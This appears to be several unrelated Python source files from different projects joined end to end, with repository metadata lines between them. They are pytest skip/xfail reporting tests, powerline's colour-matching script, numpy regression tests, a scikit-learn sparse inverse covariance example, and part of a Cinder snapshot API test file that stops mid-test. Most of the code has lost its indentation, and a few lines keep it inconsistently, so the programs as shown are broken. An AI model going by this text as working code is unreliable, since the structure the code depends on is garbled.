def test_skipif_reporting(self, testdir, params):
p = testdir.makepyfile(test_foo="""
import pytest
@pytest.mark.skipif(%(params)s)
def test_that():
assert 0
""" % dict(params=params))
result = testdir.runpytest(p, '-s', '-rs')
result.stdout.fnmatch_lines([
"*SKIP*1*test_foo.py*platform*",
"*1 skipped*"
])
assert result.ret == 0
@pytest.mark.parametrize('marker, msg1, msg2', [
('skipif', 'SKIP', 'skipped'),
('xfail', 'XPASS', 'xpassed'),
])
def test_skipif_reporting_multiple(self, testdir, marker, msg1, msg2):
testdir.makepyfile(test_foo="""
import pytest
@pytest.mark.{marker}(False, reason='first_condition')
@pytest.mark.{marker}(True, reason='second_condition')
def test_foobar():
assert 1
""".format(marker=marker))
result = testdir.runpytest('-s', '-rsxX')
result.stdout.fnmatch_lines([
"*{msg1}*test_foo.py*second_condition*".format(msg1=msg1),
"*1 {msg2}*".format(msg2=msg2),
])
assert result.ret == 0
def test_skip_not_report_default(testdir):
p = testdir.makepyfile(test_one="""
import pytest
def test_this():
pytest.skip("hello")
""")
result = testdir.runpytest(p, '-v')
result.stdout.fnmatch_lines([
#"*HINT*use*-r*",
"*1 skipped*",
])
def test_skipif_class(testdir):
p = testdir.makepyfile("""
import pytest
class TestClass:
pytestmark = pytest.mark.skipif("True")
def test_that(self):
assert 0
def test_though(self):
assert 0
""")
result = testdir.runpytest(p)
result.stdout.fnmatch_lines([
"*2 skipped*"
])
def test_skip_reasons_folding():
path = 'xyz'
lineno = 3
message = "justso"
longrepr = (path, lineno, message)
class X:
pass
ev1 = X()
ev1.when = "execute"
ev1.skipped = True
ev1.longrepr = longrepr
ev2 = X()
ev2.longrepr = longrepr
ev2.skipped = True
l = folded_skips([ev1, ev2])
assert len(l) == 1
    num, fspath, reported_lineno, reason = l[0]
    assert num == 2
    assert fspath == path
    assert reported_lineno == lineno
    assert reason == message
def test_skipped_reasons_functional(testdir):
testdir.makepyfile(
test_one="""
from conftest import doskip
def setup_function(func):
doskip()
def test_func():
pass
class TestClass:
def test_method(self):
doskip()
""",
test_two = """
from conftest import doskip
doskip()
""",
conftest = """
import pytest
def doskip():
pytest.skip('test')
"""
)
result = testdir.runpytest('--report=skipped')
result.stdout.fnmatch_lines([
"*SKIP*3*conftest.py:3: test",
])
assert result.ret == 0
def test_reportchars(testdir):
testdir.makepyfile("""
import pytest
def test_1():
assert 0
@pytest.mark.xfail
def test_2():
assert 0
@pytest.mark.xfail
def test_3():
pass
def test_4():
pytest.skip("four")
""")
result = testdir.runpytest("-rfxXs")
result.stdout.fnmatch_lines([
"FAIL*test_1*",
"XFAIL*test_2*",
"XPASS*test_3*",
"SKIP*four*",
])
def test_reportchars_error(testdir):
testdir.makepyfile(
conftest="""
def pytest_runtest_teardown():
assert 0
""",
test_simple="""
def test_foo():
pass
""")
result = testdir.runpytest('-rE')
result.stdout.fnmatch_lines([
'ERROR*test_foo*',
])
def test_reportchars_all(testdir):
testdir.makepyfile("""
import pytest
def test_1():
assert 0
@pytest.mark.xfail
def test_2():
assert 0
@pytest.mark.xfail
def test_3():
pass
def test_4():
pytest.skip("four")
""")
result = testdir.runpytest("-ra")
result.stdout.fnmatch_lines([
"FAIL*test_1*",
"SKIP*four*",
"XFAIL*test_2*",
"XPASS*test_3*",
])
def test_reportchars_all_error(testdir):
testdir.makepyfile(
conftest="""
def pytest_runtest_teardown():
assert 0
""",
test_simple="""
def test_foo():
pass
""")
result = testdir.runpytest('-ra')
result.stdout.fnmatch_lines([
'ERROR*test_foo*',
])
@pytest.mark.xfail("hasattr(sys, 'pypy_version_info')")
def test_errors_in_xfail_skip_expressions(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif("asd")
def test_nameerror():
pass
@pytest.mark.xfail("syntax error")
def test_syntax():
pass
def test_func():
pass
""")
result = testdir.runpytest()
markline = " ^"
if sys.platform.startswith("java"):
# XXX report this to java
markline = "*" + markline[8:]
result.stdout.fnmatch_lines([
"*ERROR*test_nameerror*",
"*evaluating*skipif*expression*",
"*asd*",
"*ERROR*test_syntax*",
"*evaluating*xfail*expression*",
" syntax error",
markline,
"SyntaxError: invalid syntax",
"*1 pass*2 error*",
])
def test_xfail_skipif_with_globals(testdir):
testdir.makepyfile("""
import pytest
x = 3
@pytest.mark.skipif("x == 3")
def test_skip1():
pass
@pytest.mark.xfail("x == 3")
def test_boolean():
assert 0
""")
result = testdir.runpytest("-rsx")
result.stdout.fnmatch_lines([
"*SKIP*x == 3*",
"*XFAIL*test_boolean*",
"*x == 3*",
])
def test_direct_gives_error(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True)
def test_skip1():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines([
"*1 error*",
])
def test_default_markers(testdir):
result = testdir.runpytest("--markers")
result.stdout.fnmatch_lines([
"*skipif(*condition)*skip*",
"*xfail(*condition, reason=None, run=True, raises=None)*expected failure*",
])
def test_xfail_test_setup_exception(testdir):
testdir.makeconftest("""
def pytest_runtest_setup():
0 / 0
""")
p = testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_func():
assert 0
""")
result = testdir.runpytest(p)
assert result.ret == 0
assert 'xfailed' in result.stdout.str()
assert 'xpassed' not in result.stdout.str()
def test_imperativeskip_on_xfail_test(testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail
def test_that_fails():
assert 0
@pytest.mark.skipif("True")
def test_hello():
pass
""")
testdir.makeconftest("""
import pytest
def pytest_runtest_setup(item):
pytest.skip("abc")
""")
result = testdir.runpytest("-rsxX")
result.stdout.fnmatch_lines_random("""
*SKIP*abc*
*SKIP*condition: True*
*2 skipped*
""")
class TestBooleanCondition:
def test_skipif(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True, reason="True123")
def test_func1():
pass
@pytest.mark.skipif(False, reason="True123")
def test_func2():
pass
""")
result = testdir.runpytest()
result.stdout.fnmatch_lines("""
*1 passed*1 skipped*
""")
def test_skipif_noreason(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.skipif(True)
def test_func():
pass
""")
result = testdir.runpytest("-rs")
result.stdout.fnmatch_lines("""
*1 error*
""")
def test_xfail(self, testdir):
testdir.makepyfile("""
import pytest
@pytest.mark.xfail(True, reason="True123")
def test_func():
assert 0
""")
result = testdir.runpytest("-rxs")
result.stdout.fnmatch_lines("""
*XFAIL*
*True123*
*1 xfail*
""")
def test_xfail_item(testdir):
# Ensure pytest.xfail works with non-Python Item
testdir.makeconftest("""
import pytest
class MyItem(pytest.Item):
nodeid = 'foo'
def runtest(self):
pytest.xfail("Expected Failure")
def pytest_collect_file(path, parent):
return MyItem("foo", parent)
""")
result = testdir.inline_run()
passed, skipped, failed = result.listoutcomes()
assert not failed
xfailed = [r for r in skipped if hasattr(r, 'wasxfail')]
assert xfailed
|
mpl-2.0
|
bezhermoso/powerline
|
tools/colors_find.py
|
32
|
1671
|
#!/usr/bin/env python
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import sys
import os
from colormath.color_objects import sRGBColor, LabColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
def get_lab(name, rgb):
rgb = sRGBColor(
int(rgb[:2], 16), int(rgb[2:4], 16), int(rgb[4:6], 16),
is_upscaled=True
)
lab = convert_color(rgb, LabColor)
return name, lab
with open(os.path.join(os.path.dirname(__file__), 'colors.map'), 'r') as f:
colors = [get_lab(*line.split('\t')) for line in f]
ulab = get_lab(None, sys.argv[1])[1]
def find_color(ulab, colors):
	# use the Lab colour passed in, not the module-level global
	cur_distance = 3 * (255 ** 2 + 1)
	cur_color = None
	for color, clab in colors:
		dist = delta_e_cie2000(ulab, clab)
if dist < cur_distance:
cur_distance = dist
cur_color = (color, clab)
return cur_color
cur_color = find_color(ulab, colors)
def lab_to_csi(lab):
rgb = convert_color(lab, sRGBColor)
colstr = ';2;' + ';'.join((str(i) for i in get_upscaled_values(rgb)))
return colstr + 'm'
def get_upscaled_values(rgb):
return [min(max(0, i), 255) for i in rgb.get_upscaled_value_tuple()]
def get_rgb(lab):
rgb = convert_color(lab, sRGBColor)
rgb = sRGBColor(*get_upscaled_values(rgb), is_upscaled=True)
return rgb.get_rgb_hex()[1:]
print(get_rgb(ulab), ':', cur_color[0], ':', get_rgb(cur_color[1]))
col_1 = lab_to_csi(ulab)
col_2 = lab_to_csi(cur_color[1])
sys.stdout.write('\033[48' + col_1 + '\033[38' + col_2 + 'abc\033[0m <-- bg:urgb, fg:crgb\n')
sys.stdout.write('\033[48' + col_2 + '\033[38' + col_1 + 'abc\033[0m <-- bg:crgb, fg:urgb\n')
|
mit
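colors_find.py above leans on three colormath calls: sRGBColor, convert_color, and delta_e_cie2000. A minimal sketch of that conversion-and-distance pipeline, with hypothetical hex inputs:

from colormath.color_objects import sRGBColor, LabColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000

def hex_to_lab(hex_rgb):
    # hex_rgb is six hex digits without a leading '#', e.g. 'ff8700'
    rgb = sRGBColor(int(hex_rgb[:2], 16), int(hex_rgb[2:4], 16),
                    int(hex_rgb[4:6], 16), is_upscaled=True)
    return convert_color(rgb, LabColor)

# CIEDE2000 distance: smaller means the colours are perceptually closer.
print(delta_e_cie2000(hex_to_lab('ff8700'), hex_to_lab('ff8800')))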
|
xxd3vin/spp-sdk
|
opt/Python27/Lib/site-packages/numpy/lib/tests/test_regression.py
|
11
|
8028
|
from numpy.testing import *
from numpy.testing.utils import _assert_valid_refcount
import numpy as np
rlevel = 1
class TestRegression(TestCase):
def test_poly1d(self,level=rlevel):
"""Ticket #28"""
assert_equal(np.poly1d([1]) - np.poly1d([1,0]),
np.poly1d([-1,1]))
def test_cov_parameters(self,level=rlevel):
"""Ticket #91"""
x = np.random.random((3,3))
y = x.copy()
np.cov(x, rowvar=1)
np.cov(y, rowvar=0)
assert_array_equal(x,y)
def test_mem_digitize(self,level=rlevel):
"""Ticket #95"""
for i in range(100):
np.digitize([1,2,3,4],[1,3])
np.digitize([0,1,2,3,4],[1,3])
def test_unique_zero_sized(self,level=rlevel):
"""Ticket #205"""
assert_array_equal([], np.unique(np.array([])))
def test_mem_vectorise(self, level=rlevel):
"""Ticket #325"""
vt = np.vectorize(lambda *args: args)
vt(np.zeros((1,2,1)), np.zeros((2,1,1)), np.zeros((1,1,2)))
vt(np.zeros((1,2,1)), np.zeros((2,1,1)), np.zeros((1,1,2)), np.zeros((2,2)))
def test_mgrid_single_element(self, level=rlevel):
"""Ticket #339"""
assert_array_equal(np.mgrid[0:0:1j],[0])
assert_array_equal(np.mgrid[0:0],[])
def test_refcount_vectorize(self, level=rlevel):
"""Ticket #378"""
def p(x,y): return 123
v = np.vectorize(p)
_assert_valid_refcount(v)
def test_poly1d_nan_roots(self, level=rlevel):
"""Ticket #396"""
p = np.poly1d([np.nan,np.nan,1], r=0)
self.assertRaises(np.linalg.LinAlgError,getattr,p,"r")
def test_mem_polymul(self, level=rlevel):
"""Ticket #448"""
np.polymul([],[1.])
def test_mem_string_concat(self, level=rlevel):
"""Ticket #469"""
x = np.array([])
np.append(x,'asdasd\tasdasd')
def test_poly_div(self, level=rlevel):
"""Ticket #553"""
u = np.poly1d([1,2,3])
v = np.poly1d([1,2,3,4,5])
q,r = np.polydiv(u,v)
assert_equal(q*v + r, u)
def test_poly_eq(self, level=rlevel):
"""Ticket #554"""
x = np.poly1d([1,2,3])
y = np.poly1d([3,4])
assert_(x != y)
assert_(x == x)
def test_mem_insert(self, level=rlevel):
"""Ticket #572"""
np.lib.place(1,1,1)
def test_polyfit_build(self):
"""Ticket #628"""
ref = [-1.06123820e-06, 5.70886914e-04, -1.13822012e-01,
9.95368241e+00, -3.14526520e+02]
x = [90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103,
104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115,
116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 129,
130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141,
146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157,
158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169,
170, 171, 172, 173, 174, 175, 176]
y = [9.0, 3.0, 7.0, 4.0, 4.0, 8.0, 6.0, 11.0, 9.0, 8.0, 11.0, 5.0,
6.0, 5.0, 9.0, 8.0, 6.0, 10.0, 6.0, 10.0, 7.0, 6.0, 6.0, 6.0,
13.0, 4.0, 9.0, 11.0, 4.0, 5.0, 8.0, 5.0, 7.0, 7.0, 6.0, 12.0,
7.0, 7.0, 9.0, 4.0, 12.0, 6.0, 6.0, 4.0, 3.0, 9.0, 8.0, 8.0,
6.0, 7.0, 9.0, 10.0, 6.0, 8.0, 4.0, 7.0, 7.0, 10.0, 8.0, 8.0,
6.0, 3.0, 8.0, 4.0, 5.0, 7.0, 8.0, 6.0, 6.0, 4.0, 12.0, 9.0,
8.0, 8.0, 8.0, 6.0, 7.0, 4.0, 4.0, 5.0, 7.0]
tested = np.polyfit(x, y, 4)
assert_array_almost_equal(ref, tested)
def test_polydiv_type(self) :
"""Make polydiv work for complex types"""
msg = "Wrong type, should be complex"
x = np.ones(3, dtype=np.complex)
q,r = np.polydiv(x,x)
assert_(q.dtype == np.complex, msg)
msg = "Wrong type, should be float"
x = np.ones(3, dtype=np.int)
q,r = np.polydiv(x,x)
assert_(q.dtype == np.float, msg)
def test_histogramdd_too_many_bins(self) :
"""Ticket 928."""
assert_raises(ValueError, np.histogramdd, np.ones((1,10)), bins=2**10)
def test_polyint_type(self) :
"""Ticket #944"""
msg = "Wrong type, should be complex"
x = np.ones(3, dtype=np.complex)
assert_(np.polyint(x).dtype == np.complex, msg)
msg = "Wrong type, should be float"
x = np.ones(3, dtype=np.int)
assert_(np.polyint(x).dtype == np.float, msg)
def test_ndenumerate_crash(self):
"""Ticket 1140"""
# Shouldn't crash:
list(np.ndenumerate(np.array([[]])))
def test_asfarray_none(self, level=rlevel):
"""Test for changeset r5065"""
assert_array_equal(np.array([np.nan]), np.asfarray([None]))
def test_large_fancy_indexing(self, level=rlevel):
# Large enough to fail on 64-bit.
nbits = np.dtype(np.intp).itemsize * 8
thesize = int((2**nbits)**(1.0/5.0)+1)
def dp():
n = 3
a = np.ones((n,)*5)
i = np.random.randint(0,n,size=thesize)
a[np.ix_(i,i,i,i,i)] = 0
def dp2():
n = 3
a = np.ones((n,)*5)
i = np.random.randint(0,n,size=thesize)
g = a[np.ix_(i,i,i,i,i)]
self.assertRaises(ValueError, dp)
self.assertRaises(ValueError, dp2)
def test_void_coercion(self, level=rlevel):
dt = np.dtype([('a','f4'),('b','i4')])
x = np.zeros((1,),dt)
assert_(np.r_[x,x].dtype == dt)
def test_who_with_0dim_array(self, level=rlevel) :
"""ticket #1243"""
import os, sys
oldstdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
try:
try:
tmp = np.who({'foo' : np.array(1)})
except:
raise AssertionError("ticket #1243")
finally:
sys.stdout.close()
sys.stdout = oldstdout
def test_include_dirs(self):
"""As a sanity check, just test that get_include and
get_numarray_include include something reasonable. Somewhat
related to ticket #1405."""
include_dirs = [np.get_include(), np.get_numarray_include()]
for path in include_dirs:
assert_(isinstance(path, (str, unicode)))
assert_(path != '')
def test_polyder_return_type(self):
"""Ticket #1249"""
assert_(isinstance(np.polyder(np.poly1d([1]), 0), np.poly1d))
assert_(isinstance(np.polyder([1], 0), np.ndarray))
assert_(isinstance(np.polyder(np.poly1d([1]), 1), np.poly1d))
assert_(isinstance(np.polyder([1], 1), np.ndarray))
def test_append_fields_dtype_list(self):
"""Ticket #1676"""
from numpy.lib.recfunctions import append_fields
F = False
base = np.array([1,2,3], dtype=np.int32)
data = np.eye(3).astype(np.int32)
names = ['a','b','c']
dlist = [np.float64, np.int32, np.int32]
        try:
            append_fields(base, names, data, dlist)
        except Exception:
            raise AssertionError("append_fields failed with a dtype list")
def test_loadtxt_fields_subarrays(self):
# For ticket #1936
from StringIO import StringIO
dt = [("a", 'u1', 2), ("b", 'u1', 2)]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([((0, 1), (2, 3))], dtype=dt))
dt = [("a", [("a", 'u1', (1,3)), ("b", 'u1')])]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([(((0,1,2), 3),)], dtype=dt))
dt = [("a", 'u1', (2,2))]
x = np.loadtxt(StringIO("0 1 2 3"), dtype=dt)
assert_equal(x, np.array([(((0, 1), (2, 3)),)], dtype=dt))
dt = [("a", 'u1', (2,3,2))]
x = np.loadtxt(StringIO("0 1 2 3 4 5 6 7 8 9 10 11"), dtype=dt)
data = [((((0,1), (2,3), (4,5)), ((6,7), (8,9), (10,11))),)]
assert_equal(x, np.array(data, dtype=dt))
if __name__ == "__main__":
run_module_suite()
|
mit
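Several of the regression tests above pin down np.poly1d/np.polydiv behaviour. The division identity that test_poly_div checks can be reproduced in isolation; a small sketch:

import numpy as np
from numpy.testing import assert_almost_equal

u = np.poly1d([1, 2, 3])
v = np.poly1d([1, 2, 3, 4, 5])
q, r = np.polydiv(u, v)
# polynomial division satisfies u == q*v + r
assert_almost_equal((q * v + r).coeffs, u.coeffs)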
|
rajat1994/scikit-learn
|
examples/covariance/plot_sparse_cov.py
|
300
|
5078
|
"""
======================================
Sparse inverse covariance estimation
======================================
Using the GraphLasso estimator to learn a covariance and sparse precision
from a small number of samples.
To estimate a probabilistic model (e.g. a Gaussian model), estimating the
precision matrix, that is the inverse covariance matrix, is as important
as estimating the covariance matrix. Indeed a Gaussian model is
parametrized by the precision matrix.
To be in favorable recovery conditions, we sample the data from a model
with a sparse inverse covariance matrix. In addition, we ensure that the
data is not too strongly correlated (limiting the largest coefficient of
the precision matrix) and that there are no small coefficients in the
precision matrix that cannot be recovered. Moreover, with a small
number of observations, it is easier to recover a correlation matrix
rather than a covariance matrix, so we scale the time series.
Here, the number of samples is slightly larger than the number of
dimensions, thus the empirical covariance is still invertible. However,
as the observations are strongly correlated, the empirical covariance
matrix is ill-conditioned and as a result its inverse --the empirical
precision matrix-- is very far from the ground truth.
If we use l2 shrinkage, as with the Ledoit-Wolf estimator, as the number
of samples is small, we need to shrink a lot. As a result, the
Ledoit-Wolf precision is fairly close to the ground truth precision, that
is not far from being diagonal, but the off-diagonal structure is lost.
The l1-penalized estimator can recover part of this off-diagonal
structure. It learns a sparse precision. It is not able to
recover the exact sparsity pattern: it detects too many non-zero
coefficients. However, the highest non-zero coefficients of the l1
estimate correspond to the non-zero coefficients in the ground truth.
Finally, the coefficients of the l1 precision estimate are biased toward
zero: because of the penalty, they are all smaller than the corresponding
ground truth value, as can be seen on the figure.
Note that the color range of the precision matrices is tweaked to
improve readability of the figure. The full range of values of the
empirical precision is not displayed.
The alpha parameter of the GraphLasso, which sets the sparsity of the
model, is chosen by internal cross-validation in the GraphLassoCV. As can
be seen in figure 2, the grid used to compute the cross-validation score
is iteratively refined in the neighborhood of the maximum.
"""
print(__doc__)
# author: Gael Varoquaux <gael.varoquaux@inria.fr>
# License: BSD 3 clause
# Copyright: INRIA
import numpy as np
from scipy import linalg
from sklearn.datasets import make_sparse_spd_matrix
from sklearn.covariance import GraphLassoCV, ledoit_wolf
import matplotlib.pyplot as plt
##############################################################################
# Generate the data
n_samples = 60
n_features = 20
prng = np.random.RandomState(1)
prec = make_sparse_spd_matrix(n_features, alpha=.98,
smallest_coef=.4,
largest_coef=.7,
random_state=prng)
cov = linalg.inv(prec)
d = np.sqrt(np.diag(cov))
cov /= d
cov /= d[:, np.newaxis]
prec *= d
prec *= d[:, np.newaxis]
X = prng.multivariate_normal(np.zeros(n_features), cov, size=n_samples)
X -= X.mean(axis=0)
X /= X.std(axis=0)
##############################################################################
# Estimate the covariance
emp_cov = np.dot(X.T, X) / n_samples
model = GraphLassoCV()
model.fit(X)
cov_ = model.covariance_
prec_ = model.precision_
lw_cov_, _ = ledoit_wolf(X)
lw_prec_ = linalg.inv(lw_cov_)
##############################################################################
# Plot the results
plt.figure(figsize=(10, 6))
plt.subplots_adjust(left=0.02, right=0.98)
# plot the covariances
covs = [('Empirical', emp_cov), ('Ledoit-Wolf', lw_cov_),
('GraphLasso', cov_), ('True', cov)]
vmax = cov_.max()
for i, (name, this_cov) in enumerate(covs):
plt.subplot(2, 4, i + 1)
plt.imshow(this_cov, interpolation='nearest', vmin=-vmax, vmax=vmax,
cmap=plt.cm.RdBu_r)
plt.xticks(())
plt.yticks(())
plt.title('%s covariance' % name)
# plot the precisions
precs = [('Empirical', linalg.inv(emp_cov)), ('Ledoit-Wolf', lw_prec_),
('GraphLasso', prec_), ('True', prec)]
vmax = .9 * prec_.max()
for i, (name, this_prec) in enumerate(precs):
ax = plt.subplot(2, 4, i + 5)
plt.imshow(np.ma.masked_equal(this_prec, 0),
interpolation='nearest', vmin=-vmax, vmax=vmax,
cmap=plt.cm.RdBu_r)
plt.xticks(())
plt.yticks(())
plt.title('%s precision' % name)
ax.set_axis_bgcolor('.7')
# plot the model selection metric
plt.figure(figsize=(4, 3))
plt.axes([.2, .15, .75, .7])
plt.plot(model.cv_alphas_, np.mean(model.grid_scores, axis=1), 'o-')
plt.axvline(model.alpha_, color='.5')
plt.title('Model selection')
plt.ylabel('Cross-validation score')
plt.xlabel('alpha')
plt.show()
|
bsd-3-clause
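Stripped of the plotting, the estimator usage in the example reduces to a fit plus two attributes. A minimal sketch, assuming the same scikit-learn vintage as the example (GraphLasso was later renamed GraphicalLasso):

import numpy as np
from sklearn.covariance import GraphLassoCV

rng = np.random.RandomState(0)
X = rng.multivariate_normal(np.zeros(5), np.eye(5), size=100)

model = GraphLassoCV()
model.fit(X)
print(model.alpha_)      # regularisation strength chosen by cross-validation
print(model.precision_)  # estimated (sparse) inverse covariance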
|
sasukeh/cinder
|
cinder/tests/unit/api/v2/test_snapshots.py
|
10
|
24185
|
# Copyright 2011 Denali Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from lxml import etree
import mock
from oslo_config import cfg
from oslo_utils import timeutils
from six.moves.urllib import parse as urllib
import webob
from cinder.api import common
from cinder.api.v2 import snapshots
from cinder import context
from cinder import db
from cinder import exception
from cinder import objects
from cinder import test
from cinder.tests.unit.api import fakes
from cinder.tests.unit.api.v2 import stubs
from cinder.tests.unit import fake_snapshot
from cinder.tests.unit import fake_volume
from cinder.tests.unit import utils
from cinder import volume
CONF = cfg.CONF
UUID = '00000000-0000-0000-0000-000000000001'
INVALID_UUID = '00000000-0000-0000-0000-000000000002'
def _get_default_snapshot_param():
return {
'id': UUID,
'volume_id': 12,
'status': 'available',
'volume_size': 100,
'created_at': None,
'user_id': 'bcb7746c7a41472d88a1ffac89ba6a9b',
'project_id': '7ffe17a15c724e2aa79fc839540aec15',
'display_name': 'Default name',
'display_description': 'Default description',
'deleted': None,
'volume': {'availability_zone': 'test_zone'}
}
def stub_snapshot_delete(self, context, snapshot):
if snapshot['id'] != UUID:
raise exception.SnapshotNotFound(snapshot['id'])
def stub_snapshot_get(self, context, snapshot_id):
if snapshot_id != UUID:
raise exception.SnapshotNotFound(snapshot_id)
param = _get_default_snapshot_param()
return param
def stub_snapshot_get_all(self, context, search_opts=None):
param = _get_default_snapshot_param()
return [param]
class SnapshotApiTest(test.TestCase):
def setUp(self):
super(SnapshotApiTest, self).setUp()
self.controller = snapshots.SnapshotsController()
self.stubs.Set(db, 'snapshot_get_all_by_project',
stubs.stub_snapshot_get_all_by_project)
self.stubs.Set(db, 'snapshot_get_all',
stubs.stub_snapshot_get_all)
self.ctx = context.RequestContext('admin', 'fakeproject', True)
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_snapshot_create(self, mock_validate):
volume = utils.create_volume(self.ctx)
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
snapshot = {
"volume_id": volume.id,
"force": False,
"name": snapshot_name,
"description": snapshot_description
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
resp_dict = self.controller.create(req, body)
self.assertIn('snapshot', resp_dict)
self.assertEqual(snapshot_name, resp_dict['snapshot']['name'])
self.assertEqual(snapshot_description,
resp_dict['snapshot']['description'])
self.assertTrue(mock_validate.called)
db.volume_destroy(self.ctx, volume.id)
def test_snapshot_create_force(self):
volume = utils.create_volume(self.ctx, status='in-use')
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
snapshot = {
"volume_id": volume.id,
"force": True,
"name": snapshot_name,
"description": snapshot_description
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
resp_dict = self.controller.create(req, body)
self.assertIn('snapshot', resp_dict)
self.assertEqual(snapshot_name,
resp_dict['snapshot']['name'])
self.assertEqual(snapshot_description,
resp_dict['snapshot']['description'])
snapshot = {
"volume_id": volume.id,
"force": "**&&^^%%$$##@@",
"name": "Snapshot Test Name",
"description": "Snapshot Test Desc"
}
body = dict(snapshot=snapshot)
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.assertRaises(exception.InvalidParameterValue,
self.controller.create,
req,
body)
db.volume_destroy(self.ctx, volume.id)
def test_snapshot_create_without_volume_id(self):
snapshot_name = 'Snapshot Test Name'
snapshot_description = 'Snapshot Test Desc'
body = {
"snapshot": {
"force": True,
"name": snapshot_name,
"description": snapshot_description
}
}
req = fakes.HTTPRequest.blank('/v2/snapshots')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, body)
@mock.patch.object(volume.api.API, "update_snapshot",
side_effect=stubs.stub_snapshot_update)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
@mock.patch(
'cinder.api.openstack.wsgi.Controller.validate_name_and_description')
def test_snapshot_update(
self, mock_validate, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get, update_snapshot):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
updates = {
"name": "Updated Test Name",
}
body = {"snapshot": updates}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
res_dict = self.controller.update(req, UUID, body)
expected = {
'snapshot': {
'id': UUID,
'volume_id': '1',
'status': u'available',
'size': 100,
'created_at': None,
'name': u'Updated Test Name',
'description': u'Default description',
'metadata': {},
}
}
self.assertEqual(expected, res_dict)
self.assertTrue(mock_validate.called)
self.assertEqual(2, len(self.notifier.notifications))
def test_snapshot_update_missing_body(self):
body = {}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, UUID, body)
def test_snapshot_update_invalid_body(self):
body = {'name': 'missing top level snapshot key'}
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % UUID)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, UUID, body)
def test_snapshot_update_not_found(self):
self.stubs.Set(volume.api.API, "get_snapshot", stub_snapshot_get)
updates = {
"name": "Updated Test Name",
}
body = {"snapshot": updates}
req = fakes.HTTPRequest.blank('/v2/snapshots/not-the-uuid')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.update, req,
'not-the-uuid', body)
@mock.patch.object(volume.api.API, "delete_snapshot",
side_effect=stubs.stub_snapshot_update)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_snapshot_delete(self, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get, delete_snapshot):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
ctx = context.RequestContext('admin', 'fake', True)
snapshot_obj = fake_snapshot.fake_snapshot_obj(ctx, **snapshot)
fake_volume_obj = fake_volume.fake_volume_obj(ctx)
snapshot_get_by_id.return_value = snapshot_obj
volume_get_by_id.return_value = fake_volume_obj
snapshot_id = UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
resp = self.controller.delete(req, snapshot_id)
self.assertEqual(202, resp.status_int)
def test_snapshot_delete_invalid_id(self):
self.stubs.Set(volume.api.API, "delete_snapshot", stub_snapshot_delete)
snapshot_id = INVALID_UUID
req = fakes.HTTPRequest.blank('/v2/snapshots/%s' % snapshot_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, snapshot_id)
@mock.patch('cinder.db.snapshot_metadata_get', return_value=dict())
@mock.patch('cinder.objects.Volume.get_by_id')
@mock.patch('cinder.objects.Snapshot.get_by_id')
def test_snapshot_show(self, snapshot_get_by_id, volume_get_by_id,
snapshot_metadata_get):
snapshot = {
'id': UUID,
'volume_id': 1,
'status': 'available',
'volume_size': 100,
'display_name': 'Default name',
'display_description': 'Default description',
'expected_attrs': ['metadata'],
}
